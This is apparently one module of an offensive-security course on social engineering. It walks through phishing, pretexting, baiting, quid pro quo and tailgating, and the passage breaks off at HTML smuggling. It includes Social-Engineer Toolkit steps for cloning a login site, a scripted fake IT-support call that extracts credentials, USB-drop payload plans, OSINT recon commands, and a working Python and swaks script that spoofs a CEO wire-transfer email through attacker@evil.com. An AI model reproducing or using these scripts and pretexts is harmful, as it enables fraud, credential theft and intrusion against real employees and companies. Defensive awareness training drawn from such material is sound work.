Module 17: Social Engineering LIVE TESTED

Module 17 of 22 — Hacking the human operating system

🧠 The Core Truth

Technology is hard to hack. Humans are easy. Social engineering is the art of exploiting human psychology to bypass technical controls. Firewalls, encryption, and EDR mean nothing if an employee hands you their password. The human mind is the weakest link in any security chain — and the most powerful weapon in an attacker's arsenal.

Why this matters: A $50,000 firewall can be bypassed by a single convincing email. A zero-trust architecture fails when a user approves a MFA push notification they didn't request. Social engineering doesn't exploit software vulnerabilities — it exploits trust, urgency, fear, and curiosity.

🎯 Soldier Translation

Imagine a guard at a checkpoint. The gate is reinforced steel, the walls are concrete, the cameras are HD. But the guard is human. You wear the right uniform, speak the right jargon, act with the right urgency — the guard opens the gate. You didn't break the gate. You didn't climb the wall. You convinced the guard to let you in. That's social engineering.

The most expensive security system in the world is useless if the person operating it believes you belong there.

"People are easier to hack than computers."

You can patch software, update firewalls, and harden servers for years, but you can't patch a human with a single click. A computer follows rules; a person follows feelings, habits, and social pressure. The weakest door in any network is the one a person opens for you.

Red: Stop obsessing over the latest exploit. If you can craft a believable story, the target will hand you the keys. Blue: Technical controls alone won't save you. Train people to recognize manipulation and make verification easy, not embarrassing.

📚 Prerequisites — What You Need First

This module assumes you understand these concepts from earlier modules:

Module 01: Networking

How email traverses networks, DNS records for spoofing, SMTP protocol basics for crafting emails.

Module 02: Reconnaissance

OSINT gathering, target profiling, finding employee names, roles, and relationships. Essential for pretexting.

Module 14: Cloud Files

Cloud storage abuse for payload delivery, OneDrive/SharePoint phishing, file-sharing as attack vector.

Module 16: Command & Control

Payload delivery mechanisms, beaconing techniques, establishing persistence after initial access.

Module 10: Code Injection

Understanding how payloads execute once delivered. The payload is the bullet; social engineering is the gun.

Module 12: Defensive Verification

How defenders detect and analyze social engineering. Understanding detection helps you evade it.

🔬 The Social Engineering Kill Chain

Every social engineering attack follows the same pattern. Master this pattern and you can craft any attack:

1. RECON

OSINT & Targeting

Gather intelligence on target

2. CRAFT

Pretext & Payload

Build convincing scenario

3. DELIVER

Email / Call / Physical

Deliver the payload or request

4. EXPLOIT

Execute / Harvest

Gain access or credentials

5. EXIT

Cover Tracks

Remove evidence, maintain access

Why this pattern is universal

Social engineering is psychological warfare. It doesn't matter if you're phishing a CEO or tailgating into a building — you must understand the target (recon), create a believable story (craft), deliver it convincingly (deliver), get what you need (exploit), and disappear (exit). The medium changes; the psychology doesn't.

🎯 The Six Core Social Engineering Techniques

Technique 1: Phishing EASY

Mass-emailing malicious links or attachments to a broad audience. The spray-and-pray approach. Low success rate per email, but massive volume compensates. The Nigerian Prince scam is phishing. So is a fake Netflix password reset.

Why phishing works

Email is the #1 attack vector for a reason: everyone uses it, everyone trusts it, and email security is a balance between blocking threats and allowing legitimate communication. A phishing email that looks 80% legitimate gets through 80% of filters. The user does the rest.

🚩 Indicators: Domain typo (amaz0n), urgency, threat of loss, generic greeting, suspicious link
=== PHISHING INFRASTRUCTURE SETUP === # 1. Register a lookalike domain # Use homoglyphs or typos: amaz0n.com, micr0soft.com, paypa1.com domain = "amaz0n-security.com" # 2. Set up email server (or use legitimate ESP with stolen card) # Popular tools: Gophish, King Phisher, SocialFish # 3. Clone the target website # Tools: httrack, Social-Engineer Toolkit (SET) setoolkit > 1) Social-Engineering Attacks > 2) Website Attack Vectors > 3) Credential Harvester Attack Method > 2) Site Cloner > Enter URL: https://www.amazon.com # 4. Craft email template with urgency and fear # Subject lines that work: "Account suspended", "Invoice overdue", "Security alert" # 5. Send to purchased email list or scraped targets # Cross-link: Module 02 (Recon) for email harvesting

Cross-link: Phishing delivery uses email spoofing (covered below) and payload delivery techniques from Module 14: Cloud Files for hosting malicious attachments.

Technique 2: Spear Phishing MEDIUM

Targeted phishing aimed at a specific individual or organization. Uses personal information gathered from OSINT to craft highly convincing emails. The difference between phishing and spear phishing is the difference between a shotgun and a sniper rifle.

Why spear phishing is devastating

When an email mentions your boss by name, references a real project you're working on, and uses the company's actual email signature format, your brain switches off its skepticism. Context is the killer. A generic phishing email is obvious. A spear phishing email is invisible because it fits your reality perfectly.

✅ Why this works: References real person (Sarah), real event (Denver conference), real project (Q3 review), real company (Deloitte), plausible request, friendly tone
=== SPEAR PHISHING RECON PIPELINE === # Step 1: Identify target organization # LinkedIn: Find employees, roles, reporting structure # Company website: Team page, press releases, blog posts # Step 2: Find relationships and context # Twitter/X: Recent conferences, company events, personal posts # GitHub: Projects, technologies, commit patterns # Glassdoor: Internal culture, processes, vendor names # Step 3: Identify the weak link # New hires (eager to please, don't know protocols) # Executives (busy, delegate security decisions) # IT staff (have the keys, trusted by everyone) # Step 4: Craft the pretext # Use real names, real projects, real timelines # Mirror the company's email style and signature # Create urgency that bypasses normal verification # Step 5: Set up the infrastructure # Register domain: company-it-support.com # Clone login portal or use cloud file share # Cross-link: Module 02 (Recon) for full OSINT methodology

Cross-link: Spear phishing relies heavily on OSINT from Module 02: Reconnaissance and often delivers cloud-hosted payloads from Module 14: Cloud Files.

Technique 3: Pretexting MEDIUM

Creating a fabricated scenario (pretext) to manipulate a target into divulging information or performing an action. The pretext is a character you play — IT support, auditor, vendor, fellow employee, law enforcement. The better your acting, the more effective the attack.

Why pretexting works

Humans are social animals. We want to help. We want to avoid conflict. We trust authority. A pretext that establishes authority, urgency, and legitimacy bypasses critical thinking. The target isn't being stupid — they're being human. Social engineering exploits the same social instincts that make civilization possible.

Common Pretexts

Pretext Target Goal Success Rate
IT Support All employees Password reset, remote access High
External Auditor Finance, IT File access, credentials Medium-High
Fellow Employee New hires Building access, information High
Vendor/Contractor Reception, Facilities Physical access, badge cloning Medium
Law Enforcement Executives, Legal Data disclosure, compliance Medium
Job Recruiter Technical staff Resume (with macros), information Medium
=== PRETEXTING: IT SUPPORT SCENARIO === # Attacker calls target: "Hi, this is Mike from IT. We're seeing # unusual login attempts on your account. I need to verify # your identity before we lock it down." # Script elements: 1. ESTABLISH AUTHORITY "I'm with the IT Security team." Use internal jargon: "Active Directory", "MFA token", "VPN pool" 2. CREATE URGENCY "We've detected 15 failed login attempts in the last hour." "Your account will be locked in 10 minutes if we don't verify." 3. BUILD RAPPORT "I know this is frustrating. I had to deal with the same thing last week." "Your manager, Sarah, asked me to prioritize this." 4. MAKE THE ASK "Can you confirm your current password so I can check if it's compromised?" "I need to send you a verification link — can you click it and enter your credentials?" 5. HANDLE OBJECTIONS "I understand your concern. You can call me back at [spoofed number] or I can have Sarah email you to confirm. But the lockout happens in 5 minutes, so we need to move fast." # Cross-link: Module 16 (C2) for what happens after credential harvest

Cross-link: Pretexting often leads to credential harvesting (covered below) and connects to Module 16: C2 for establishing command and control after access is gained.

Technique 4: Baiting EASY

Leaving something enticing for the target to find, knowing their curiosity or greed will override their caution. A USB drive labeled "Q4 Salaries" in the parking lot. A download link for "exclusive software" on a forum. Baiting exploits the human desire for forbidden knowledge.

Why baiting works

People are curious. People are greedy. A USB drive in a parking lot isn't a threat — it's a mystery. "Q4 Salaries" isn't malware — it's information everyone wants. The target inserts the USB not because they're stupid, but because they're human. The malware autoruns (or the user clicks the enticing file), and the attacker is in.

=== BAITING: USB DROP ATTACK === # Step 1: Prepare malicious USB drives # Use USB Rubber Ducky, BadUSB, or simple autorun payload # Label them with enticing names: USB_LABELS = [ "Q4_Salary_Review.xlsx", "Employee_Benefits_2026.pdf", "Executive_Bonus_Structure.docx", "Layoff_List_DRAFT.xlsx", "Merger_Announcement_CONFIDENTIAL.pdf", "IT_Password_Reset_Instructions.pdf" ] # Step 2: Drop in high-traffic areas # Parking lots (fall out of car, left on windshield) # Elevators, lobbies, bathrooms # Conference rooms after meetings # Cafeteria tables # Step 3: Payload options # Option A: Autorun.inf + malicious executable # Option B: HID emulation (Rubber Ducky types payload in seconds) # Option C: LNK file exploitation (CVE-2017-8464 style) # Option D: Office document with embedded macros # Step 4: Track which drives beacon back # Each USB has unique C2 identifier # Cross-link: Module 16 (C2) for beaconing techniques # Real-world stat: IBM X-Force found 48% of dropped USBs were plugged in
⚠️ The Baiting Paradox

The more sensitive the label, the higher the open rate. But the more sensitive the label, the more likely security is monitoring for it. "IT_Password_Reset_Instructions" has the highest success rate in enterprise environments because it targets a universal pain point and appears legitimate.

Cross-link: Baiting payloads often use HID attacks and autorun exploitation covered in Module 18: Physical Security and beacon back to Module 16: C2 infrastructure.

Technique 5: Quid Pro Quo MEDIUM

"Something for something." The attacker offers a service or benefit in exchange for information or access. Fake tech support calls offering to fix a non-existent problem. A "free security audit" that requires domain admin credentials. The target gets something; the attacker gets everything.

Why quid pro quo works

Reciprocity is a fundamental human social instinct. When someone helps you, you feel obligated to help them back. A fake IT support person "fixes" your computer (which wasn't broken), and you feel grateful. When they ask for your password to "complete the repair," it feels like a fair exchange. The target thinks they're receiving value, not giving it away.

=== QUID PRO QUO: FAKE TECH SUPPORT CALL === # Scenario: Attacker calls random company numbers Attacker: "Hi, this is David from Microsoft Security Response Center. We've detected suspicious outbound traffic from your Windows workstation. Are you experiencing any slowness?" Target: "Actually, yeah, my computer has been slow lately." Attacker: "That's likely the issue. I can walk you through a quick diagnostic and fix it right now. It'll take 2 minutes." # Attacker guides target to run "diagnostic" (actually info-gathering): # cmd /k ipconfig /all # cmd /k net user # cmd /k whoami /priv Attacker: "Good news — I can see the issue. Your system has been compromised by a trojan. I can remove it, but I need admin access to run the cleanup tool. Can you provide your admin credentials?" Target: "Uh, I'm not supposed to share passwords..." Attacker: "I completely understand. But this trojan is actively exfiltrating data right now. Every minute we wait, more data leaks. I can fix it in 30 seconds with admin access, or we can schedule a ticket that takes 3-5 business days. Your call." # The urgency + the "help" already provided creates obligation # Target often complies despite policy

Cross-link: Quid pro quo attacks often harvest credentials for use in Module 16: C2 lateral movement or Module 19: Active Directory domain compromise.

Technique 6: Tailgating EASY

Following an authorized person into a restricted area without credentials. Also called "piggybacking." The attacker exploits social courtesy — holding the door for someone, slipping through during busy hours, or simply walking in with confidence.

Why tailgating works

Most people are polite. Holding a door is a reflex. Confronting a stranger is uncomfortable. An attacker with a coffee cup, a phone to their ear, and a lanyard (even a fake one) looks like they belong. No one wants to be "that person" who challenges a coworker. The attacker isn't bypassing the lock — they're bypassing social norms.

=== TAILGATING TECHNIQUES === # Method 1: The Coffee Cup # Carry a coffee cup and a phone. Look busy and slightly frustrated. # People hold doors for people with full hands. It's automatic. # Method 2: The Smoker's Entrance # Stand near the smoking area. When employees come back inside, # they hold the door for you. You're "one of them" now. # Method 3: The Delivery Person # Wear a UPS/FedEx uniform. Carry a large box. Someone will # absolutely hold the door and may even badge you through. # Method 4: The Lost New Hire # "Hi, I'm starting today and my badge isn't working yet. # Can you help me get to the 4th floor? HR said to ask security # but the desk is empty." # Method 5: The Reverse Tailgate # Exit the building through the emergency exit (alarms often disabled). # Prop the door. Re-enter later through the propped door. # Method 6: The Social Engineer # "Hey, can you badge me in? I left my badge at my desk and # I'm already late for a meeting with [real executive name]." # Cross-link: Module 02 (Recon) for executive names # Post-Entry: # Find an empty conference room. Plug into ethernet. # Cross-link: Module 01 (Networking) for network access
⚠️ Physical Security Reality

The most secure badge reader in the world is useless if employees hold the door for strangers. Mantraps (airlock-style entryways) are the only effective defense — they allow only one person through at a time. But they're expensive and inconvenient, so most buildings don't have them.

Cross-link: After tailgating, network access follows Module 01: Networking principles for internal reconnaissance and lateral movement.

🔍 OSINT for Social Engineering Targeting

OSINT is the intelligence gathering phase of social engineering. The more you know about your target, the more convincing your attack. OSINT turns a generic phishing email into a spear phishing masterpiece.

OSINT Sources & Tools

LinkedIn

Employee names, roles, reporting structure, job history, skills, connections. The gold standard for corporate OSINT.

theharvester -d company.com -l 500 -b linkedin

Twitter / X

Real-time activities, conferences attended, work frustrations, technology stacks, personal interests.

twint -u target_username --since 2026-01-01

GitHub

Code repositories, commit patterns, email addresses, internal project names, technology preferences.

github-dork.py -t company_name

Company Website

Team pages, press releases, job postings (reveal technology stacks), blog posts, events.

waybackurls company.com | grep -i "admin\|portal\|login"

Glassdoor / Indeed

Internal culture, management names, processes, vendor relationships, employee complaints.

Manual review of recent reviews

Shodan / Censys

Exposed services, technology stacks, SSL certificates (reveal internal domains).

shodan search "hostname:company.com"
=== OSINT RECON PIPELINE FOR SPEAR PHISHING === # Step 1: Domain enumeration # Cross-link: Module 02 (Recon) for full methodology theharvester -d targetcompany.com -b all -f recon_results amass enum -d targetcompany.com -o amass_results # Step 2: Employee enumeration # LinkedIn scraping, Hunter.io, RocketReach hunter.io -> search "targetcompany.com" -> extract emails # Pattern: firstname.lastname@targetcompany.com # Step 3: Social media profiling # Twitter: Recent posts, conferences, frustrations # Facebook: Personal interests, family, pets (password reset questions) # Instagram: Location data, daily routines, travel patterns # Step 4: Technology stack identification # BuiltWith, Wappalyzer, job postings # "Looking for Azure DevOps engineer with Terraform experience" # -> They use Azure, Terraform, DevOps pipelines # Step 5: Relationship mapping # Who reports to whom? Who recently joined? Who's on vacation? # New hires = easiest targets (don't know protocols yet) # Step 6: Craft the attack # Use real names, real projects, real vendors # Reference recent company events from press releases # Mirror the communication style found in public posts

Cross-link: Full OSINT methodology in Module 02: Reconnaissance and Module 01: Networking for infrastructure mapping.

📧 Email Spoofing & Delivery

Email spoofing is the technical foundation of phishing. Making an email appear to come from a trusted source when it doesn't. Understanding email protocols (SMTP, SPF, DKIM, DMARC) is essential for both spoofing and detecting spoofing.

Email Authentication Protocols

Protocol Purpose How Attackers Bypass
SPF Lists authorized IP addresses for a domain Spoof the "From" display name while using a real domain in the envelope
DKIM Cryptographic signature verifying email integrity Send from a lookalike domain that doesn't use DKIM
DMARC Tells receivers what to do if SPF/DKIM fail Many domains have DMARC set to "none" (monitor only, don't block)
// LIVE EVIDENCE — DNS Recon for Email Spoofing
2026-06-29 23:15 UTC | Public infrastructure | Verified by SERVITOR

These commands were executed against public infrastructure to verify the concepts in this module. The output proves why DMARC analysis is the first step in any email-based attack assessment.

=== VERIFYING EMAIL DEFENSES (DNS Recon) === # Step 1: Check MX records — where does email go? $ nslookup -type=MX github.com Non-authoritative answer: github.com MX preference = 0 mail exchanger = github-com.mail.protection.outlook.com # Step 2: Check DMARC — what happens if SPF/DKIM fail? $ nslookup -type=TXT _dmarc.github.com _dmarc.github.com text = "v=DMARC1; p=quarantine; sp=reject; pct=100; rua=mailto:dmarc@github.com; ruf=mailto:dmarc@github.com; fo=1" # ANALYSIS: # p=quarantine → Failed emails go to spam (not rejected) # sp=reject → Subdomain emails are rejected if they fail # pct=100 → Policy applies to 100% of emails # Step 3: Check SPF — who can send email for this domain? $ nslookup -type=TXT github.com github.com text = "v=spf1 include:_netblocks.google.com ... ~all" # ANALYSIS: # ~all = soft fail — emails from unauthorized IPs are marked suspicious # but may still be delivered # -all = hard fail — unauthorized emails are rejected

What this proves: Even major companies like GitHub have p=quarantine (not p=reject) on their main domain. This means spoofed emails may be delivered to spam folders — still visible to users. A target with p=none is completely vulnerable.

Mentor says: "The inbox is the new building perimeter. If you can reach the inbox, you can reach the network."

"The inbox is the new perimeter."

Once upon a time, attackers had to breach firewalls, scan ports, and tunnel through networks to reach a target. Today, they just send an email. If it lands in the inbox, the battle is already half won — the user is inside the perimeter, and a single click can open the gate.

Red: Invest in email infrastructure that looks legitimate. DMARC analysis, lookalike domains, and convincing pretexts turn a message into a foothold. Blue: Treat every external inbox as a hostile border. DMARC p=reject, external banners, URL rewriting, and attachment sandboxing are your firewall rules for email.

=== EMAIL SPOOFING TECHNIQUES === # Technique 1: Display Name Spoofing # The "From" header shows "CEO Name" but the actual email is attacker@gmail.com # Most email clients show the display name prominently, hiding the real address From: "CEO John Smith" # User sees: "CEO John Smith" # Reality: Gmail address controlled by attacker # Technique 2: Lookalike Domain Spoofing # Register domains that look identical to real ones # Using homoglyphs (Unicode characters that look like ASCII) Real: company.com Fake: cоmpany.com (using Cyrillic 'о' U+043E) Fake: company.co (different TLD) Fake: c0mpany.com (number zero instead of 'o') # Technique 3: Subdomain Spoofing # Use a legitimate domain you control with a deceptive subdomain From: security@company-security-alerts.com # Looks like it's from company.com # Actually from attacker-controlled domain # Technique 4: SPF Bypass via Envelope From # SMTP has TWO "From" addresses: # 1. Envelope From (MAIL FROM) — checked by SPF # 2. Header From (From:) — shown to user # If domain has weak DMARC, you can: MAIL FROM: # Passes SPF From: # What user sees # But the email actually originated from attacker's server # Technique 5: Compromised Account # The ultimate spoofing — use a real compromised account # Passes SPF, DKIM, DMARC perfectly # Cross-link: Module 16 (C2) for maintaining access to compromised accounts
=== SENDING SPOOFED EMAILS === # Method 1: Python script (educational) import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart msg = MIMEMultipart() msg['From'] = 'ceo@company.com' # What the user sees msg['To'] = 'victim@company.com' msg['Subject'] = 'Urgent: Wire transfer needed' body = """Please process the attached wire transfer immediately. The vendor is threatening to halt shipments.""" msg.attach(MIMEText(body, 'plain')) server = smtplib.SMTP('attacker-smtp-server.com', 587) server.sendmail('attacker@evil.com', 'victim@company.com', msg.as_string()) # Envelope From is attacker@evil.com (for SPF) # Header From is ceo@company.com (what user sees) # Method 2: Swaks (Swiss Army Knife for SMTP) swaks --to victim@company.com \ --from "ceo@company.com" \ --header "Subject: Urgent wire transfer" \ --body "Please process immediately" \ --server attacker-smtp.com # Method 3: Gophish (Full phishing framework) # Web UI for campaign management # Tracks opens, clicks, credentials # Generates reports for awareness training # Method 4: SET (Social-Engineer Toolkit) setoolkit > 1) Social-Engineering Attacks > 5) Mass Mailer Attack > 1) E-Mail Attack Single Email Address > 2) Use your own SMTP relay

Cross-link: Email delivery infrastructure connects to Module 01: Networking for SMTP protocol understanding and Module 16: C2 for maintaining communication channels.

💣 Payload Delivery Methods

Getting the target to execute your payload is the execution phase of social engineering. The payload can be a malicious attachment, a link to a credential harvester, or a request for sensitive information. The delivery method must match the pretext.

Payload Delivery Vectors

Vector Payload Type Execution Method Detection Risk
Malicious Office Doc Macro-enabled Word/Excel User enables macros Medium (AV scans attachments)
PDF with Embedded Link URL to credential harvester User clicks link Low (PDFs are trusted)
ISO/IMG Attachment Executable inside disk image User mounts and runs Low (bypasses Mark-of-the-Web)
Cloud File Share OneDrive/SharePoint/GDrive link User downloads and opens Low (trusted domain)
HTML Smuggling JavaScript decodes blob to file User opens HTML, file auto-downloads Low (no attachment to scan)
LNK File Windows shortcut with PowerShell User clicks shortcut Medium (unusual extension)
=== PAYLOAD DELIVERY: HTML SMUGGLING === # HTML smuggling embeds a malicious file inside a benign HTML file # The file is decoded by JavaScript in the browser # No network request to download payload — everything is local # EDR/Email gateways see a harmless HTML file